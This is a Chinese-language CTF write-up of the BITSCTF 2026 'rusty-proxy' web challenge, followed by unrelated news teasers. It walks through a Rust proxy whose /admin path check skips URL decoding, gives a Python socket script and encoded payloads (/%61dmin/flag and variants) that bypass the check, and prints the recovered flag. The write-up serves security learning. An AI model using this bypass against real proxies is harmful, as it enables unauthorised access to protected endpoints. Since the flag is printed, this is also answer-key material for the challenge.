【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min
题目BITSCTF 2026\题目\WEB\rusty-proxyrusty-proxyI just vibecoded a highly secure reverse proxy using rust, I hope it works properly.http://chals.bitskrieg.in:25001解题思路访问网站http://chals.bitskrieg.in:25001http://chals.bitskrieg.in:25001/api/status问题分析题目要求我们分析一个用Rust编写的反向代理服务器rusty-proxy并找到其中的安全漏洞从而获取后端服务器的flag。提供的代码结构如下proxy/src/main.rsRust编写的反向代理服务器代码backend/server.pyPython编写的后端服务器代码docker-compose.ymlDocker Compose配置文件代码审计1. 后端服务器分析首先查看后端服务器的代码backend/server.pyfromflaskimportFlask,jsonify,requestimportcheroot.wsgiimportos appFlask(__name__)FLAGos.getenv(FLAG,BITSCTF{fake_flag})app.route(/,methods[GET,POST])defindex():ifrequest.methodPOST:_request.get_data()returnjsonify({version:1.0.0,endpoints:[/,/api/status],})app.route(/api/status)defstatus():returnjsonify({status:running,uptime:operational,})app.route(/admin/flag)defvault():returnjsonify({flag:FLAG})if__name____main__:bind_addr(0.0.0.0,8080)servercheroot.wsgi.Server(bind_addr,app)print(fBackend running on{bind_addr[0]}:{bind_addr[1]})try:server.start()exceptKeyboardInterrupt:server.stop()从后端代码可以看出后端是一个Flask应用运行在8080端口提供了三个端点/返回版本信息和可用端点/api/status返回服务器状态/admin/flag返回flag这是我们的目标直接访问/admin/flag无法获取到flag2. 反向代理服务器分析接下来查看反向代理服务器的代码proxy/src/main.rs2.1 路径检查函数fnis_path_allowed(path:str)-bool{letnormalizedpath.to_lowercase();ifnormalized.starts_with(/admin){returnfalse;}true}这个函数负责检查请求路径是否允许访问。它将路径转换为小写然后检查是否以/admin开头如果是则返回false拒绝访问。2.2 请求解析函数asyncfnparse_request(reader:mutBufReadertokio::io::ReadHalfTcpStream,)-ResultOptionRequestMeta,staticstr{// ... 解析请求行 ...lettrimmed_linerequest_line.trim_end().to_string();letparts:Vecstrtrimmed_line.splitn(3, ).collect();ifparts.len()!3{returnErr(malformed request-line);}letmethodparts[0].to_string();letpathparts[1].to_string();letversionparts[2].to_string();// ... 解析请求头 ...Ok(Some(RequestMeta{method,path,version,headers,is_chunked,content_length,client_wants_close,}))}这个函数负责解析HTTP请求从请求行中提取方法、路径和版本。注意它直接将路径存储到RequestMeta结构中没有进行任何URL解码。2.3 客户端处理函数asyncfnhandle_client(client:TcpStream,pool:ArcConnPool){let(read_half,mutwrite_half)tokio::io::split(client);letmutreaderBufReader::new(read_half);loop{letmetamatchparse_request(mutreader).await{Ok(Some(m))m,Ok(None)break,Err(msg){let_send_error(mutwrite_half,400 Bad Request,msg).await;break;}};letclose_aftermeta.client_wants_close;if!is_path_allowed(meta.path){let_send_error(mutwrite_half,403 Forbidden,Access denied.\n).await;break;}// ... 连接后端服务器 ...letmutheadformat!({} {} {}\r\n,meta.method,meta.path,meta.version);for(k,v)inmeta.headers{head.push_str(format!({}: {}\r\n,k,v));}head.push_str(\r\n);// ... 发送请求到后端服务器 ...}}这个函数负责处理客户端请求解析HTTP请求获取请求元数据调用is_path_allowed函数检查路径是否允许访问如果允许访问将原始路径传递给后端服务器漏洞发现在分析代码后我发现了一个潜在的安全漏洞is_path_allowed函数没有对路径进行URL解码。这意味着如果路径是URL编码的比如/%61dmin/flag那么path.to_lowercase()会将其转换为/%61dmin/flag因为URL编码的部分是大写的然后检查是否以/admin开头这显然不会匹配所以会返回true允许访问代理服务器会将原始的URL编码路径传递给后端服务器后端服务器Flask应用会自动对URL进行解码将其解码为/admin/flag然后返回flag漏洞利用测试1使用URL编码的路径代码访问importsocket# 创建socket连接socksocket.socket(socket.AF_INET,socket.SOCK_STREAM)sock.settimeout(5)sock.connect((chals.bitskrieg.in,25001))# 构建HTTP请求使用URL编码的路径# %61 是字符 a 的URL编码requestbGET /%61dmin/flag HTTP/1.1\r\nrequestbHost: chals.bitskrieg.in:25001\r\nrequestbConnection: close\r\nrequestb\r\n# 发送请求sock.sendall(request)# 接收响应responsebwhileTrue:try:datasock.recv(1024)ifnotdata:breakresponsedataexceptsocket.timeout:break# 关闭连接sock.close()print(response.decode())测试结果HTTP/1.1 200 OK Content-Type: application/json Content-Length: 55 Date: Sun, 22 Feb 2026 07:08:01 GMT Server: Cheroot/11.1.2 {flag:BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}}成功获取到了flag直接访问http://chals.bitskrieg.in:25001/%61dmin/flag其他测试我还测试了其他几种URL编码方式都成功绕过了路径检查/%61%64min/flag只编码前两个字符/%61%64%6d%69%6e/flag编码整个admin字符串所有测试都成功获取到了flag。漏洞原理输入处理不当is_path_allowed函数没有对输入路径进行URL解码直接使用原始路径进行检查。信任用户输入函数信任用户提供的路径没有进行任何验证或转换。后端自动解码后端服务器Flask应用会自动对URL进行解码使得编码后的路径能够被正确解析。总结通过代码审计我发现了一个URL编码绕过漏洞利用这个漏洞成功获取了后端服务器的flag。这个漏洞的根本原因是is_path_allowed函数没有对路径进行URL解码导致攻击者可以通过发送URL编码的路径来绕过路径检查。最终flagBITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}

相关新闻

TI HTU模块安全机制与双缓冲配置实战解析

TI HTU模块安全机制与双缓冲配置实战解析

1. HTU模块核心功能与设计哲学解析在嵌入式系统,尤其是汽车电子和工业控制这类对实时性与可靠性要求严苛的领域,微控制器(MCU)内部的数据搬运效率与安全性直接决定了整个系统的成败。德州仪器(TI)的高端定时…

2026/7/23 20:01:23 阅读更多 →
HWAG与N2HET:嵌入式高精度角度测量与定时控制实战解析

HWAG与N2HET:嵌入式高精度角度测量与定时控制实战解析

1. 项目概述与核心价值在发动机管理、工业电机控制这类对实时性和精度要求极高的领域,如何精确、可靠地获取旋转轴的角度位置,是决定整个系统性能的基石。想象一下,一台高速运转的发动机,其曲轴每旋转一度,活塞的位置、…

2026/7/23 20:00:23 阅读更多 →
2026深度实测:16款降AI率软件测评,论文降重降ai率终极答案!

2026深度实测:16款降AI率软件测评,论文降重降ai率终极答案!

随着AI写作技术的迅猛发展,越来越多的学术创作者开始依赖这类工具提升效率。然而,随着2026年各大高校与科研机构对AIGC检测标准的不断升级,论文中若存在明显AI痕迹,将面临严重的学术风险。在这一背景下,如何有效降低AI…

2026/7/23 20:00:23 阅读更多 →

最新新闻

嵌入式系统EMIF接口详解:SDRAM与异步存储器的配置与调试实战

嵌入式系统EMIF接口详解:SDRAM与异步存储器的配置与调试实战

1. 项目概述与EMIF核心价值在嵌入式系统开发中,尤其是那些对数据处理能力、实时性或存储容量有较高要求的场景,片上集成的存储器往往捉襟见肘。这时,外部存储器接口(External Memory Interface, EMIF)就成了连接微控制…

2026/7/23 20:11:28 阅读更多 →
提示工程监控预警系统设计与实战

提示工程监控预警系统设计与实战

1. 项目概述:提示工程监控预警系统的核心价值在提示工程(Prompt Engineering)领域,监控预警系统就像汽车仪表盘对于驾驶员的意义——它让你无需深入引擎舱就能实时掌握运行状态。我们设计的这套可视化系统,通过5个关键…

2026/7/23 20:11:28 阅读更多 →
UNet 汽车图像分割动画解说

UNet 汽车图像分割动画解说

1. 引言:图像分割与UNet概述 1.1 什么是图像分割? 图像分割是计算机视觉领域的核心任务之一,其目标是将图像划分为若干具有语义意义的区域。与图像分类(给整个图像打标签)和目标检测(用边界框标出物体位置…

2026/7/23 20:11:28 阅读更多 →
高光谱成像(二)光谱角映射 SAM

高光谱成像(二)光谱角映射 SAM

高光谱成像(二)光谱角映射 SAM 光谱角映射(Spectral Angle Mapping,简称 SAM)是高光谱图像分析中的一种经典分类与匹配方法。它基于像素光谱与参考光谱之间的角度相似性,实现对地物类型的识别。相比其他方法…

2026/7/23 20:11:28 阅读更多 →
网络组播和广播,单播

网络组播和广播,单播

ip addr add 192.168.63.41/24 broadcast 172.28.223.255 dev eth0.63该网段正确的广播地址应该是:192.168.63.255后果:广播地址配置错误,会导致 ARP 广播、DHCP 广播等无法正常工作,可能造成同网段设备无法通信。MAC单播地址给BS…

2026/7/23 20:11:27 阅读更多 →
ARM Cortex-R VIM中断向量表奇偶校验机制详解与安全设计

ARM Cortex-R VIM中断向量表奇偶校验机制详解与安全设计

1. 项目概述与核心价值 在嵌入式系统,尤其是汽车电子和工业控制这类对可靠性要求极高的领域,一个微小的内存位翻转(Bit Flip)就可能导致整个系统失控。想象一下,你的汽车在高速公路上巡航,负责刹车或转向控…

2026/7/23 20:10:27 阅读更多 →

日新闻

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表)

更多请点击: https://intelliparadigm.com 第一章:从单点好评到指数级传播:AI副业主理人必须掌握的4层口碑渗透模型(含ROI测算表) 当AI副业主理人不再仅满足于单次服务交付,而是主动构建可复用、可裂变、可…

2026/7/23 0:00:25 阅读更多 →
AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析

更多请点击: https://codechina.net 第一章:AI写作开头钩子设计:为什么你的AI文案完读率不足18%?——基于2,346篇A/B测试报告的归因分析 在对2,346篇跨行业AI生成文案的A/B测试数据进行聚类分析后,我们发现&#xff1…

2026/7/23 0:01:26 阅读更多 →
Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具

Chitchatter完整指南:免费开源的终极点对点安全聊天工具 【免费下载链接】chitchatter Secure peer-to-peer chat that is serverless, decentralized, and ephemeral 项目地址: https://gitcode.com/gh_mirrors/ch/chitchatter Chitchatter是一款革命性的安…

2026/7/23 0:01:26 阅读更多 →

周新闻

Go语言静态资源打包方案对比与实践指南

Go语言静态资源打包方案对比与实践指南

1. 项目背景与核心需求在Go语言开发中,我们经常需要处理静态资源文件的打包问题。无论是Web应用的模板文件、前端资源,还是配置文件、证书等,都需要随程序一起分发。传统做法是将这些文件与编译后的二进制文件放在同一目录下,但这…

2026/7/22 8:58:19 阅读更多 →
Go语言实现高性能LDAP认证服务的架构与实践

Go语言实现高性能LDAP认证服务的架构与实践

1. 项目背景与核心价值LDAP(轻量级目录访问协议)作为企业级身份认证的黄金标准,已经服务了超过80%的财富500强公司。我在金融科技领域实施统一认证体系时,发现传统Java方案存在启动慢、内存占用高等痛点。而Go语言凭借其协程并发模…

2026/7/22 19:43:43 阅读更多 →
【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

【AI面试官实战指南】:用ChatGPT模拟10类高频技术岗面试,3天提升应答精准度92%

更多请点击: https://intelliparadigm.com 第一章:AI面试官实战指南的核心价值与适用场景 AI面试官并非替代人类HR的“黑箱工具”,而是以可解释、可审计、可迭代的方式,赋能招聘全链路的关键基础设施。其核心价值在于将主观经验沉…

2026/7/23 17:49:47 阅读更多 →

月新闻